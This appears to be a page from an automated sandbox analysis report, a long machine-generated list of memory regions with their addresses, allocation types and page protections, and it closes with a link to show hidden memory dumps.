heap
page read and write
8F88000
unkown
page write copy
B0A000
unkown
page read and write
2E5A000
heap
page read and write
9445000
unkown
page readonly
EAA000
heap
page read and write
3270000
heap
page read and write
17651B3E000
heap
page read and write
17651F1C000
heap
page read and write
1F5A241A000
heap
page read and write
176514B7000
heap
page read and write
11150000
remote allocation
page read and write
2AC0000
heap
page read and write
29B1000
heap
page read and write
1764F173000
heap
page read and write
176504FA000
heap
page read and write
2E10000
heap
page read and write
1765073F000
heap
page read and write
3050000
heap
page read and write
2BDC000
stack
page read and write
31CF000
unkown
page read and write
1F5A3EF0000
heap
page read and write
1764A441000
heap
page read and write
1764F9D2000
heap
page read and write
D33A000
heap
page read and write
2ECE000
stack
page read and write
2BEC000
direct allocation
page read and write
29B1000
heap
page read and write
1F5A2447000
heap
page read and write
29B1000
heap
page read and write
B24E000
direct allocation
page read and write
176506C8000
heap
page read and write
17651055000
heap
page read and write
54C0000
unkown
page readonly
1764A44F000
heap
page read and write
1764F991000
heap
page read and write
1F5A2430000
heap
page read and write
D372000
heap
page read and write
1765053D000
heap
page read and write
2F3D000
stack
page read and write
3086000
heap
page read and write
A1A9000
direct allocation
page read and write
1765057E000
heap
page read and write
2E96000
heap
page read and write
D2B8000
heap
page read and write
1764A5D1000
heap
page read and write
7847000
unkown
page execute read
2342FBCC000
heap
page read and write
2FA0000
heap
page read and write
1764FDA1000
heap
page read and write
29B1000
heap
page read and write
6079000
unkown
page execute read
90B8000
unkown
page readonly
17651600000
heap
page read and write
29B1000
heap
page read and write
A001000
direct allocation
page read and write
2FF0000
heap
page read and write
2757000
heap
page read and write
2757000
heap
page read and write
29B1000
heap
page read and write
EA1000
heap
page read and write
176523E2000
heap
page read and write
3479000
heap
page read and write
17650056000
heap
page read and write
2BAC000
stack
page read and write
2B60000
heap
page read and write
2E90000
heap
page read and write
9F71000
unkown
page readonly
29B1000
heap
page read and write
176520A8000
heap
page read and write
1765072C000
heap
page read and write
E9B000
heap
page read and write
17651C88000
heap
page read and write
D33E000
heap
page read and write
17650644000
heap
page read and write
17650742000
heap
page read and write
2FD0000
heap
page read and write
2F29000
heap
page read and write
29B1000
heap
page read and write
2342FC11000
heap
page read and write
17650718000
heap
page read and write
3466000
heap
page read and write
29B1000
heap
page read and write
339A000
heap
page read and write
17652024000
heap
page read and write
2B95000
direct allocation
page read and write
2BE0000
heap
page read and write
B24E000
direct allocation
page read and write
29B1000
heap
page read and write
2F1B000
heap
page read and write
B2F0000
trusted library allocation
page read and write
9400000
unkown
page readonly
29B1000
heap
page read and write
17650A66000
heap
page read and write
2D4E000
unkown
page read and write
2CED000
stack
page read and write
17651869000
heap
page read and write
34D8DFE000
stack
page read and write
781D5FF000
stack
page read and write
93CE000
unkown
page readonly
2A7D000
stack
page read and write
17651E57000
heap
page read and write
2F25000
heap
page read and write
9418000
unkown
page readonly
9342000
unkown
page readonly
17A00B21000
heap
page read and write
29B1000
heap
page read and write
7450DFE000
stack
page read and write
17650AA8000
heap
page read and write
1765074A000
heap
page read and write
D9E000
stack
page read and write
17A00B18000
heap
page read and write
29B1000
heap
page read and write
17652277000
heap
page read and write
17A00B21000
heap
page read and write
320F000
stack
page read and write
17651826000
heap
page read and write
176522B8000
heap
page read and write
EB1000
heap
page read and write
A1F7000
direct allocation
page read and write
17A00A9A000
heap
page read and write
9458000
unkown
page readonly
35D0000
heap
page read and write
29B1000
heap
page read and write
3397000
heap
page read and write
1F5A240C000
heap
page read and write
E3C000
heap
page read and write
1F5A2416000
heap
page read and write
2342FBFB000
heap
page read and write
D332000
heap
page read and write
A1B8000
direct allocation
page read and write
17651BC2000
heap
page read and write
944B000
unkown
page readonly
2BC1000
direct allocation
page read and write
9397000
unkown
page readonly
17650769000
heap
page read and write
1764FC98000
heap
page read and write
33A0000
heap
page read and write
740B000
unkown
page execute read
54B0000
heap
page read and write
3360000
heap
page read and write
1F5A2370000
heap
page read and write
2F5E000
stack
page read and write
29B1000
heap
page read and write
EA8000
heap
page read and write
932F000
unkown
page readonly
2DD0000
heap
page read and write
3467000
heap
page read and write
A1E0000
direct allocation
page read and write
AB3000
unkown
page write copy
17A00A70000
heap
page read and write
1F5A242D000
heap
page read and write
130000
heap
page read and write
9436000
unkown
page readonly
17A008F0000
heap
page read and write
29B1000
heap
page read and write
B315000
trusted library allocation
page read and write
EA9000
heap
page read and write
1765192F000
heap
page read and write
365F000
stack
page read and write
32C0000
heap
page read and write
17650759000
heap
page read and write
A0E0000
direct allocation
page read and write
2F0C000
heap
page read and write
1764A4C0000
heap
page read and write
9FE2000
direct allocation
page read and write
67BB000
unkown
page execute read
324E000
stack
page read and write
ACF000
unkown
page read and write
1765073F000
heap
page read and write
29B1000
heap
page read and write
1764A4C0000
heap
page read and write
17651E98000
heap
page read and write
3387000
heap
page read and write
AFD000
unkown
page read and write
1765111A000
heap
page read and write
1765233C000
heap
page read and write
3479000
heap
page read and write
EA9000
heap
page read and write
ADF000
unkown
page write copy
1765212C000
heap
page read and write
176509E2000
heap
page read and write
E99000
heap
page read and write
17651F5F000
heap
page read and write
3476000
heap
page read and write
176514B6000
heap
page read and write
176509A0000
heap
page read and write
905E000
unkown
page read and write
1764FD5E000
heap
page read and write
176522FA000
heap
page read and write
17650B2C000
heap
page read and write
29B1000
heap
page read and write
10EFC000
stack
page read and write
EA9000
heap
page read and write
ACB000
unkown
page read and write
17650756000
heap
page read and write
33A0000
heap
page read and write
17650752000
heap
page read and write
17652234000
heap
page read and write
29B1000
heap
page read and write
9069000
unkown
page read and write
1765233C000
heap
page read and write
A2BE000
direct allocation
page read and write
18C000
stack
page read and write
29B1000
heap
page read and write
34D8BFE000
stack
page read and write
29B1000
heap
page read and write
176509A1000
heap
page read and write
3397000
heap
page read and write
1765075B000
heap
page read and write
2B3D000
direct allocation
page read and write
1764A441000
heap
page read and write
2342FBC4000
heap
page read and write
176518EC000
heap
page read and write
933E000
unkown
page readonly
92DA000
unkown
page readonly
2CA6000
heap
page read and write
17A00A9B000
heap
page read and write
30EF000
unkown
page read and write
29B1000
heap
page read and write
2C8D000
stack
page read and write
2342FBC8000
heap
page read and write
9FCC000
direct allocation
page read and write
2D00000
heap
page read and write
2A50000
heap
page read and write
1765074C000
heap
page read and write
6B70000
unkown
page execute read
176521B0000
heap
page read and write
1764FDE2000
heap
page read and write
A0CA000
direct allocation
page read and write
ADB0000
direct allocation
page read and write
9434000
unkown
page readonly
176520A8000
heap
page read and write
1764FB91000
heap
page read and write
17651AFC000
heap
page read and write
17650602000
heap
page read and write
17651ABB000
heap
page read and write
D364000
heap
page read and write
1F5A2675000
heap
page read and write
48A000
unkown
page execute read
940A000
unkown
page readonly
17650752000
heap
page read and write
17650745000
heap
page read and write
11150000
remote allocation
page read and write
2CAF000
heap
page read and write
339F000
stack
page read and write
12D1A000
heap
page read and write
17651FA0000
heap
page read and write
E5C000
heap
page read and write
12D0B000
heap
page read and write
ED4000
heap
page read and write
2CFC000
stack
page read and write
17650735000
heap
page read and write
176522B8000
heap
page read and write
1765073F000
heap
page read and write
1765212C000
heap
page read and write
1765095E000
heap
page read and write
2B10000
heap
page read and write
29B1000
heap
page read and write
17650752000
heap
page read and write
9429000
unkown
page readonly
17650752000
heap
page read and write
29B1000
heap
page read and write
1764FEE1000
heap
page read and write
A011000
direct allocation
page read and write
1764A412000
heap
page read and write
1F5A241A000
heap
page read and write
1764A441000
heap
page read and write
2BD6000
direct allocation
page read and write
43C0000
heap
page read and write
A054000
direct allocation
page read and write
2E46000
heap
page read and write
E9F000
heap
page read and write
EA5000
heap
page read and write
E6D000
heap
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
B24E000
direct allocation
page read and write
2A9E000
unkown
page read and write
29B1000
heap
page read and write
1F5A241C000
heap
page read and write
17651F5E000
heap
page read and write
1764FCDA000
heap
page read and write
17651FE2000
heap
page read and write
29B1000
heap
page read and write
2342FCD0000
remote allocation
page read and write
5420000
direct allocation
page execute and read and write
17651F1C000
heap
page read and write
6FCFF000
unkown
page read and write
EA1000
heap
page read and write
CD000
stack
page read and write
17650716000
heap
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
176503B0000
heap
page read and write
29B1000
heap
page read and write
17650752000
heap
page read and write
17650B6E000
heap
page read and write
29B1000
heap
page read and write
1764A457000
heap
page read and write
17650D7E000
heap
page read and write
29B1000
heap
page read and write
1765073A000
heap
page read and write
17651970000
heap
page read and write
17650735000
heap
page read and write
2720000
heap
page read and write
17650729000
heap
page read and write
6856000
unkown
page execute read
1F5A2441000
heap
page read and write
1764FD1C000
heap
page read and write
401000
unkown
page execute read
2B52000
direct allocation
page read and write
176523D1000
heap
page read and write
B2F0000
trusted library allocation
page read and write
34D88FA000
stack
page read and write
2E57000
heap
page read and write
29B1000
heap
page read and write
1764FDA0000
heap
page read and write
936B000
unkown
page readonly
2E5E000
unkown
page read and write
1764FB1C000
heap
page read and write
1764A9CF000
heap
page read and write
8F5B000
unkown
page execute read
E67000
heap
page read and write
17651474000
heap
page read and write
1765216F000
heap
page read and write
17A02954000
heap
page read and write
176522B8000
heap
page read and write
32FC000
stack
page read and write
17650752000
heap
page read and write
9412000
unkown
page readonly
B316000
trusted library allocation
page read and write
176521F2000
heap
page read and write
2342FC2B000
heap
page read and write
B24E000
direct allocation
page read and write
17650752000
heap
page read and write
2B10000
heap
page read and write
29B1000
heap
page read and write
17651ABA000
heap
page read and write
335F000
stack
page read and write
D40000
heap
page read and write
176512E8000
heap
page read and write
1765071B000
heap
page read and write
D3B2000
heap
page read and write
2342FC44000
heap
page read and write
AE17000
direct allocation
page read and write
9354000
unkown
page readonly
2E5A000
heap
page read and write
29B1000
heap
page read and write
2B0E000
direct allocation
page read and write
17650729000
heap
page read and write
3479000
heap
page read and write
9328000
unkown
page readonly
2FF6000
heap
page read and write
3009000
heap
page read and write
17650BF2000
heap
page read and write
17A00ABE000
heap
page read and write
29B1000
heap
page read and write
A082000
direct allocation
page read and write
176507D2000
heap
page read and write
29B1000
heap
page read and write
2746000
heap
page read and write
17650791000
heap
page read and write
D2CB000
heap
page read and write
17650A24000
heap
page read and write
B317000
trusted library allocation
page read and write
2B78000
direct allocation
page read and write
3477000
heap
page read and write
940E000
unkown
page readonly
17651684000
heap
page read and write
349F000
stack
page read and write
29B1000
heap
page read and write
291F000
unkown
page read and write
176513AE000
heap
page read and write
93C2000
unkown
page readonly
2F16000
heap
page read and write
3480000
heap
page read and write
9302000
unkown
page readonly
1765216E000
heap
page read and write
1765074C000
heap
page read and write
2757000
heap
page read and write
3360000
heap
page read and write
17651EDA000
heap
page read and write
2E2B000
heap
page read and write
B1B0000
direct allocation
page read and write
2342FBB7000
heap
page read and write
17651264000
heap
page read and write
D2FA000
heap
page read and write
29B1000
heap
page read and write
33A0000
heap
page read and write
2F46000
heap
page read and write
17A009D0000
heap
page read and write
A01F000
direct allocation
page read and write
2FA0000
heap
page read and write
17650759000
heap
page read and write
B24C000
direct allocation
page read and write
120F000
stack
page read and write
90BA000
unkown
page readonly
E0E000
heap
page read and write
9416000
unkown
page readonly
176515BF000
heap
page read and write
90A9000
unkown
page read and write
4AC000
unkown
page execute read
909E000
unkown
page read and write
D2BC000
heap
page read and write
1764FEEA000
heap
page read and write
A07B000
direct allocation
page read and write
9358000
unkown
page readonly
17650856000
heap
page read and write
176519B2000
heap
page read and write
32F0000
heap
page read and write
1764D373000
heap
page read and write
8FE3000
unkown
page read and write
17651A36000
heap
page read and write
29B1000
heap
page read and write
A3F5000
direct allocation
page read and write
2CC6000
heap
page read and write
9314000
unkown
page readonly
1765011C000
heap
page read and write
3050000
heap
page read and write
2F27000
heap
page read and write
9331000
unkown
page readonly
9368000
unkown
page readonly
2CBA000
heap
page read and write
2342FBC7000
heap
page read and write
29B1000
heap
page read and write
2B71000
direct allocation
page read and write
17A00AC0000
heap
page read and write
D304000
heap
page read and write
29B1000
heap
page read and write
1764FE66000
heap
page read and write
17A00B28000
heap
page read and write
3476000
heap
page read and write
17650014000
heap
page read and write
9093000
unkown
page read and write
29B1000
heap
page read and write
17651970000
heap
page read and write
2E7E000
stack
page read and write
387F000
stack
page read and write
17651970000
heap
page read and write
300A000
heap
page read and write
176502A8000
heap
page read and write
17650D7E000
heap
page read and write
1765074F000
heap
page read and write
2E57000
heap
page read and write
41C000
unkown
page execute read
2BAB000
direct allocation
page read and write
2C9F000
heap
page read and write
176523DA000
heap
page read and write
29B1000
heap
page read and write
2B44000
direct allocation
page read and write
E39000
heap
page read and write
6FD02000
unkown
page readonly
B1B4000
direct allocation
page read and write
A205000
direct allocation
page read and write
3050000
heap
page read and write
E9F000
heap
page read and write
FFDD0000
direct allocation
page read and write
17A00A40000
heap
page read and write
30FD000
stack
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
931B000
unkown
page readonly
17650898000
heap
page read and write
1765074B000
heap
page read and write
17650735000
heap
page read and write
29B1000
heap
page read and write
2342FBCC000
heap
page read and write
29B1000
heap
page read and write
17650814000
heap
page read and write
12D28000
heap
page read and write
2C5E000
stack
page read and write
29B1000
heap
page read and write
12CDA000
heap
page read and write
1764FFD2000
heap
page read and write
93F3000
unkown
page readonly
17A009F0000
heap
page read and write
17651FA0000
heap
page read and write
9473000
unkown
page readonly
93A9000
unkown
page readonly
781D2FF000
stack
page read and write
1765072C000
heap
page read and write
A15D000
direct allocation
page read and write
A391000
direct allocation
page read and write
29B1000
heap
page read and write
ACCA000
stack
page read and write
781D3FE000
stack
page read and write
29B1000
heap
page read and write
2E40000
heap
page read and write
17651DD3000
heap
page read and write
B2F0000
trusted library allocation
page read and write
2E96000
heap
page read and write
2342FBFE000
heap
page read and write
176509E2000
heap
page read and write
B317000
trusted library allocation
page read and write
938F000
unkown
page readonly
3250000
heap
page read and write
934F000
unkown
page readonly
1764A3FB000
heap
page read and write
75DA000
unkown
page execute read
9443000
unkown
page readonly
2A1F000
stack
page read and write
17650E86000
heap
page read and write
906D000
unkown
page read and write
2AD0000
heap
page read and write
93D3000
unkown
page readonly
5EED000
unkown
page execute read
2F2A000
heap
page read and write
2F2A000
heap
page read and write
17650752000
heap
page read and write
1F5A23F8000
heap
page read and write
A072000
direct allocation
page read and write
1764FA98000
heap
page read and write
1765015E000
heap
page read and write
2D00000
heap
page read and write
B18E000
stack
page read and write
2746000
heap
page read and write
8FD6000
unkown
page read and write
2DF0000
heap
page read and write
2F46000
heap
page read and write
17650752000
heap
page read and write
92F9000
unkown
page readonly
2342FC2B000
heap
page read and write
10FFC000
stack
page read and write
1764A47F000
heap
page read and write
17A00A99000
heap
page read and write
3477000
heap
page read and write
3290000
heap
page read and write
935B000
unkown
page readonly
17651761000
heap
page read and write
272C000
heap
page read and write
2CCA000
heap
page read and write
1765074C000
heap
page read and write
2342FC44000
heap
page read and write
29B1000
heap
page read and write
306B000
heap
page read and write
17650766000
heap
page read and write
33EE000
stack
page read and write
1764FDE2000
heap
page read and write
36A0000
heap
page read and write
17A00AA0000
heap
page read and write
8FB3000
unkown
page read and write
9430000
unkown
page readonly
A064000
direct allocation
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
36A0000
heap
page read and write
3476000
heap
page read and write
3397000
heap
page read and write
29B1000
heap
page read and write
405000
unkown
page execute read
17651222000
heap
page read and write
A38F000
direct allocation
page read and write
17650E44000
heap
page read and write
35D0000
heap
page read and write
17651B80000
heap
page read and write
29B1000
heap
page read and write
B28F000
stack
page read and write
1764A4C0000
heap
page read and write
D355000
heap
page read and write
8F67000
unkown
page execute read
2AAD000
stack
page read and write
1765136C000
heap
page read and write
1765074C000
heap
page read and write
5410000
heap
page read and write
2342FC44000
heap
page read and write
2CB7000
heap
page read and write
A308000
direct allocation
page read and write
17650057000
heap
page read and write
1765073F000
heap
page read and write
3097000
heap
page read and write
17651E14000
heap
page read and write
17A00AAC000
heap
page read and write
1F5A4330000
heap
page read and write
17651E98000
heap
page read and write
941F000
unkown
page readonly
54AC000
stack
page read and write
D34B000
heap
page read and write
A40B000
direct allocation
page read and write
2E30000
heap
page read and write
8FD5000
unkown
page write copy
17650723000
heap
page read and write
2ED0000
heap
page read and write
3270000
heap
page read and write
3440000
heap
page read and write
17650899000
heap
page read and write
12D25000
heap
page read and write
1764A443000
heap
page read and write
93DA000
unkown
page readonly
17650735000
heap
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
1764FEEA000
heap
page read and write
E9B000
heap
page read and write
26E0000
heap
page read and write
17A00AAB000
heap
page read and write
1764A43D000
heap
page read and write
29B1000
heap
page read and write
A475000
direct allocation
page read and write
29B1000
heap
page read and write
2342FBB0000
heap
page read and write
29B1000
heap
page read and write
1764A441000
heap
page read and write
17A00AA0000
heap
page read and write
299D000
stack
page read and write
DC4000
heap
page read and write
D2D1000
heap
page read and write
1765136D000
heap
page read and write
1765070A000
heap
page read and write
A06B000
direct allocation
page read and write
942D000
unkown
page readonly
176503F2000
heap
page read and write
17651600000
heap
page read and write
17650767000
heap
page read and write
A385000
direct allocation
page read and write
176516C6000
heap
page read and write
2F90000
heap
page read and write
93F1000
unkown
page readonly
29B1000
heap
page read and write
D50000
heap
page read and write
2CCA000
heap
page read and write
1764E773000
heap
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
176508DA000
heap
page read and write
1764A447000
heap
page read and write
400000
unkown
page readonly
2E57000
heap
page read and write
17651684000
heap
page read and write
A44B000
direct allocation
page read and write
2FC0000
heap
page read and write
17650E86000
heap
page read and write
932B000
unkown
page readonly
8FC0000
unkown
page read and write
D314000
heap
page read and write
17651F1C000
heap
page read and write
8F87000
unkown
page read and write
17650752000
heap
page read and write
34D92FE000
stack
page read and write
6970000
unkown
page execute read
9320000
unkown
page readonly
3007000
heap
page read and write
B317000
trusted library allocation
page read and write
176517A2000
heap
page read and write
1764A415000
heap
page read and write
1765074C000
heap
page read and write
29B1000
heap
page read and write
D3B0000
heap
page read and write
3050000
heap
page read and write
176520EA000
heap
page read and write
2342FCB0000
heap
page read and write
2EFB000
heap
page read and write
D2B0000
heap
page read and write
D34E000
heap
page read and write
2CBA000
heap
page read and write
D328000
heap
page read and write
2F50000
heap
page read and write
EB5000
heap
page read and write
1765074C000
heap
page read and write
17650725000
heap
page read and write
2342FC01000
heap
page read and write
176520EB000
heap
page read and write
8F9A000
unkown
page read and write
3190000
heap
page read and write
935F000
unkown
page readonly
176512A6000
heap
page read and write
A412000
direct allocation
page read and write
29B1000
heap
page read and write
176517E4000
heap
page read and write
9454000
unkown
page readonly
2AF4000
direct allocation
page read and write
A1FE000
direct allocation
page read and write
1765074C000
heap
page read and write
9362000
unkown
page readonly
1764FC56000
heap
page read and write
CA9F000
stack
page read and write
B32E000
stack
page read and write
6FCF9000
unkown
page read and write
1765119E000
heap
page read and write
1765071A000
heap
page read and write
17650769000
heap
page read and write
92D6000
unkown
page readonly
29B1000
heap
page read and write
29B1000
heap
page read and write
1765212C000
heap
page read and write
2DE0000
heap
page read and write
2342FBFE000
heap
page read and write
29B1000
heap
page read and write
DC0000
heap
page read and write
176515BE000
heap
page read and write
2CFE000
unkown
page read and write
6225000
unkown
page execute read
32CF000
stack
page read and write
8F8C000
unkown
page write copy
2342FBEA000
heap
page read and write
D358000
heap
page read and write
17651096000
heap
page read and write
9365000
unkown
page readonly
93FB000
unkown
page readonly
17651096000
heap
page read and write
2B61000
direct allocation
page read and write
29B1000
heap
page read and write
2F60000
heap
page read and write
2CB7000
heap
page read and write
2CA7000
heap
page read and write
2FF7000
heap
page read and write
B2F2000
trusted library allocation
page read and write
1764FD5E000
heap
page read and write
29B1000
heap
page read and write
1764FA56000
heap
page read and write
17650716000
heap
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
2AFF000
direct allocation
page read and write
29B1000
heap
page read and write
17650602000
heap
page read and write
A37E000
direct allocation
page read and write
2342FAB0000
heap
page read and write
17651827000
heap
page read and write
2D7D000
stack
page read and write
1764FCDA000
heap
page read and write
9389000
unkown
page readonly
C99A000
trusted library allocation
page read and write
945F000
unkown
page readonly
176520A8000
heap
page read and write
17650CFA000
heap
page read and write
1F5A2448000
heap
page read and write
2CCA000
heap
page read and write
54C1000
unkown
page execute read
92E9000
unkown
page readonly
17651CCA000
heap
page read and write
176504B8000
heap
page read and write
29B1000
heap
page read and write
AE53000
direct allocation
page read and write
29B1000
heap
page read and write
17651D0C000
heap
page read and write
29B1000
heap
page read and write
B5AE000
stack
page read and write
2E97000
heap
page read and write
9EE4000
unkown
page readonly
8FD2000
unkown
page read and write
29B1000
heap
page read and write
ADCE000
direct allocation
page read and write
17650AEA000
heap
page read and write
34D91FE000
stack
page read and write
29B1000
heap
page read and write
2E60000
heap
page read and write
3250000
heap
page read and write
29B1000
heap
page read and write
176503F2000
heap
page read and write
A382000
direct allocation
page read and write
B2F0000
trusted library allocation
page read and write
17650F0A000
heap
page read and write
29B1000
heap
page read and write
17650098000
heap
page read and write
17650FD0000
heap
page read and write
1764FBD2000
heap
page read and write
34D90FD000
stack
page read and write
17A02420000
heap
page read and write
E9E000
heap
page read and write
400000
unkown
page readonly
17650742000
heap
page read and write
2AE7000
direct allocation
page read and write
2ADD000
stack
page read and write
17652234000
heap
page read and write
2B27000
direct allocation
page read and write
30FF000
unkown
page read and write
17A02950000
heap
page read and write
2FD0000
heap
page read and write
17650718000
heap
page read and write
1F5A2670000
heap
page read and write
EAC000
heap
page read and write
176521F3000
heap
page read and write
1764A447000
heap
page read and write
D2BE000
heap
page read and write
17650F8E000
heap
page read and write
6FCF5000
unkown
page readonly
93DD000
unkown
page readonly
93BF000
unkown
page readonly
2EAE000
stack
page read and write
1764DD73000
heap
page read and write
29B1000
heap
page read and write
B2F0000
trusted library allocation
page read and write
1765072C000
heap
page read and write
AB6000
unkown
page read and write
1F5A2420000
heap
page read and write
17650E02000
heap
page read and write
EAD000
heap
page read and write
1BE000
stack
page read and write
17650745000
heap
page read and write
17650718000
heap
page read and write
176523C1000
heap
page read and write
9427000
unkown
page readonly
8FC7000
unkown
page write copy
781CFBA000
stack
page read and write
1765192E000
heap
page read and write
B312000
trusted library allocation
page read and write
1764FF2C000
heap
page read and write
176516C7000
heap
page read and write
There are 1431 hidden memdumps, click here to show them.